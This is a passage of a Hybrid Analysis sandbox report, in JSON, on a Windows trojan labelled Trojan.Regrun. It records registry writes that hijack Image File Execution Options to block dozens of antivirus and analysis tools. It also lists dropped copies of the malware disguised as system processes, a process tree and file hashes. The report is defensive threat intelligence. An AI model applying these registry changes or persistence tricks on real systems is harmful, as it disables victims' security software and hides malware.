\"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\NOD32KUI.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\NOD32.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\NAVAPSVC.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\SELFUPDATE.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\NAVAPW32.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\AVCONSOL.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\WEBSCANX.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\NPFMNTOR.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\VSSTAT.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\ZJB.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\KPFWSVC.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\QQDOCTORMAIN.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\RAVTASK.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\MMSK.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\WOPTICLEAN.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\QQKAV.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\EGHOST.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\QQDOCTOR.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\REGCLEAN.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\FYFIREWALL.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\IPARMO.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\ADAM.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\ICESWORD.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\360RPT.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\AGENTSVR.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\APPSVC32.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\AUTORUNS.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\AVGRSSVC.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\DSMAIN.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\360SD.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\360RP.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\AVMONITOR.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\CCENTER.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\CCSVCHST.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\FILEDSTY.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\FTCLEANERSHELL.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")\n \"explorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\HIJACKTHIS.EXE\"; Key: \"DEBUGGER\"; Value: \"ntsd -d\")", "origin": "Registry Access", "attck_id": "T1546.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/012"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7
https://hybrid-analysis.com/sample/85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7
Hybrid Analysis - Killers
{"size": 163903, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7", "sha256": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7", "av_detect": 94, "vx_family": "Trojan.Regrun", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 64, "total_signatures": 146, "extracted_files": [{"name": "Empty.pif", "file_path": "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif", "file_size": 163903, "sha256": "a0bddfc41e9da2a23054ac2dd6ee27f535da20a6a68d360467c417a945335021", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE", "file_size": 163903, "sha256": "422b7d338c2d41d64ebed6aacf2fdce16a077191a4723d551dcfa57105adb8a0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE", "file_size": 163903, "sha256": "773167f1feb4e4ac6852c69b1b86dc9f03df323fc37cfb9311aac7043ece2296", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE", "file_size": 163903, "sha256": "01ca5a6cafa66589b6b5fd56aca5c457536777c694325f72ba28becafcb92853", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE", "file_size": 163903, "sha256": "f9c9c1d649f3405ffb1eec0ce315b411bae222f4d797d91b1af66235e225ce44", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE", "file_size": 163903, "sha256": "87e49de69d2fe0f5327c7739fd81f892fe68b9b2e093d3f169431f27391c5984", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "%WINDIR%\\D3_08.exe", "file_size": 163903, "sha256": "9f54e45fb74b9c874ba42fd3a725f33699030c446b59d33fbcd534ed039533e6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%WINDIR%\\System32\\IExplorer.exe", "file_size": 163903, "sha256": "94f08bb26450157eada70d02b11baa575d4855eb2d49f860f65263dd13d1645d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "MrD3_08.scr", "file_path": "%WINDIR%\\System32\\MrD3_08.scr", "file_size": 163903, "sha256": "947d5c9fe858a128ba3513e8e16164890718862dd7ce8a2fb4a47f1dd417fc34", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "shell.exe", "file_path": "%WINDIR%\\System32\\shell.exe", "file_size": 163903, "sha256": "66c7125471686dc002417c77b1fc99aa00257633592e7d0bf58c3893b0ca9ad2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "C:\\D3_08.exe", "file_size": 163903, "sha256": "3e1096d0f05fd0398e4c72cf00e9ae1bc4ac015299928fdc6c0907519ce4ad92", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "PuRn4m4.txt", "file_path": "C:\\PuRn4m4.txt", "file_size": 441, "sha256": "c8cfecfb4260f0488e4152cdaaca8854865f0e20d15e9e37cba26f81db38c195", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "services.exe", "file_size": 163903, "sha256": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe.bin", "file_size": 163903, "sha256": "9f54e45fb74b9c874ba42fd3a725f33699030c446b59d33fbcd534ed039533e6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_size": 163903, "sha256": "2689fb624654257fca8788cf0b5b27bd56a98f94f77867203eb0337f7ff63d02", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_size": 163903, "sha256": "dffcc8e867ea9903efbb099d0e957acdad45a5dd1d2a031b45318d1e9c281e9b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe (PID: 6008)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE.bin", "file_size": 163903, "sha256": "66c7125471686dc002417c77b1fc99aa00257633592e7d0bf58c3893b0ca9ad2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE4BB1.bin", "file_size": 163903, "sha256": "70f975dc17af4cd7d182bf9f182deff9050327ca1a11b6259fee3adc81d4d0da", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE4667.bin", "file_size": 163903, "sha256": "c9005d2d09994810d7b0efe871ecd0688a8dd98cae3b51249e2a1b4fec01c4ee", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE4665.bin", "file_size": 163903, "sha256": "d4e4329662ab9814b54afda1f0158734b890546ed2962a603139a0c7eb819bd3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lsass.exe", "file_size": 163903, "sha256": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_size": 163903, "sha256": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "winlogon.exe", "file_size": 163903, "sha256": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "smss.exe", "file_size": 163903, "sha256": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_size": 163903, "sha256": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "csrss.exe", "file_size": 163903, "sha256": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE4BB3.bin", "file_size": 163903, "sha256": "66c7125471686dc002417c77b1fc99aa00257633592e7d0bf58c3893b0ca9ad2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_size": 163903, "sha256": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_size": 163903, "sha256": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE4D76.bin", "file_size": 163903, "sha256": "9f54e45fb74b9c874ba42fd3a725f33699030c446b59d33fbcd534ed039533e6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_size": 163903, "sha256": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE4D7B.bin", "file_size": 163903, "sha256": "94f08bb26450157eada70d02b11baa575d4855eb2d49f860f65263dd13d1645d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_size": 163903, "sha256": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_size": 163903, "sha256": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "SMSS.EXE (PID: 952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)", "7 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 8041)", "1 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File contains assembly code", "File is the product of a small codebase (9 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00006008", "name": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe", "normalized_path": "C:\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe", "sha256": "85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7"}, {"uid": "00000000-00005948", "parentuid": "00000000-00006008", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "d4e4329662ab9814b54afda1f0158734b890546ed2962a603139a0c7eb819bd3"}, {"uid": "00000000-00004240", "parentuid": "00000000-00005948", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "d4e4329662ab9814b54afda1f0158734b890546ed2962a603139a0c7eb819bd3"}, {"uid": "00000000-00003452", "parentuid": "00000000-00005948", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c9005d2d09994810d7b0efe871ecd0688a8dd98cae3b51249e2a1b4fec01c4ee"}, {"uid": "00000000-00004068", "parentuid": "00000000-00005948", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "535827bae7a976d7aa49aaed3fab07c7170ac21d873e5c335d9413f46a53aad8"}, {"uid": "00000000-00004364", "parentuid": "00000000-00005948", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "53f6e40dbf3273dd985f74cdeffed5846abac087de317ede294894198273253c"}, {"uid": "00000000-00000272", "parentuid": "00000000-00005948", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8060df46cb9580dc1faa95ed30e65fe7295d018be13350069f53bcc84a9a3bbf"}, {"uid": "00000000-00003572", "parentuid": "00000000-00000272", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "d4e4329662ab9814b54afda1f0158734b890546ed2962a603139a0c7eb819bd3"}, {"uid": "00000000-00004336", "parentuid": "00000000-00000272", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c9005d2d09994810d7b0efe871ecd0688a8dd98cae3b51249e2a1b4fec01c4ee"}, {"uid": "00000000-00001864", "parentuid": "00000000-00000272", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "535827bae7a976d7aa49aaed3fab07c7170ac21d873e5c335d9413f46a53aad8"}, {"uid": "00000000-00003448", "parentuid": "00000000-00000272", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "53f6e40dbf3273dd985f74cdeffed5846abac087de317ede294894198273253c"}, {"uid": "00000000-00001584", "parentuid": "00000000-00000272", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8060df46cb9580dc1faa95ed30e65fe7295d018be13350069f53bcc84a9a3bbf"}, {"uid": "00000000-00003488", "parentuid": "00000000-00000272", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "e95ee5451b5098a063958adf5a247ecdca22d70414a1cab2bad65dd6f77a5748"}, {"uid": "00000000-00003624", "parentuid": "00000000-00000272", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "9bc6e981f4b5813380ea541c2995de87d3c70d5ead9a3b5301d17e1bf751e6eb"}, {"uid": "00000000-00003964", "parentuid": "00000000-00005948", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "e95ee5451b5098a063958adf5a247ecdca22d70414a1cab2bad65dd6f77a5748"}, {"uid": "00000000-00001352", "parentuid": "00000000-00003964", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "d4e4329662ab9814b54afda1f0158734b890546ed2962a603139a0c7eb819bd3"}, {"uid": "00000000-00000472", "parentuid": "00000000-00003964", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c9005d2d09994810d7b0efe871ecd0688a8dd98cae3b51249e2a1b4fec01c4ee"}, {"uid": "00000000-00004432", "parentuid": "00000000-00003964", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "535827bae7a976d7aa49aaed3fab07c7170ac21d873e5c335d9413f46a53aad8"}, {"uid": "00000000-00003716", "parentuid": "00000000-00003964", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "53f6e40dbf3273dd985f74cdeffed5846abac087de317ede294894198273253c"}, {"uid": "00000000-00003084", "parentuid": "00000000-00003964", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8060df46cb9580dc1faa95ed30e65fe7295d018be13350069f53bcc84a9a3bbf"}, {"uid": "00000000-00003212", "parentuid": "00000000-00003964", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "e95ee5451b5098a063958adf5a247ecdca22d70414a1cab2bad65dd6f77a5748"}, {"uid": "00000000-00003552", "parentuid": "00000000-00003964", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "9bc6e981f4b5813380ea541c2995de87d3c70d5ead9a3b5301d17e1bf751e6eb"}, {"uid": "00000000-00004616", "parentuid": "00000000-00003964", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "70f975dc17af4cd7d182bf9f182deff9050327ca1a11b6259fee3adc81d4d0da"}, {"uid": "00000000-00003376", "parentuid": "00000000-00005948", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "9bc6e981f4b5813380ea541c2995de87d3c70d5ead9a3b5301d17e1bf751e6eb"}, {"uid": "00000000-00002452", "parentuid": "00000000-00006008", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c9005d2d09994810d7b0efe871ecd0688a8dd98cae3b51249e2a1b4fec01c4ee"}, {"uid": "00000000-00002952", "parentuid": "00000000-00002452", 